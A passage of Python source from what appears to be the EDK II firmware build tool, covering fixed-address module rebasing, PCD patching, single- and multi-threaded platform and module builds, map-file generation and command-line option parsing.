if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize / 0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize / 0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize / 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize / 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None: continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, self.ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
for Module in self.HashSkipModules:
Module.CreateAsBuiltInf(True)
self.BuildModules = []
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache is None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase is None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
"processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
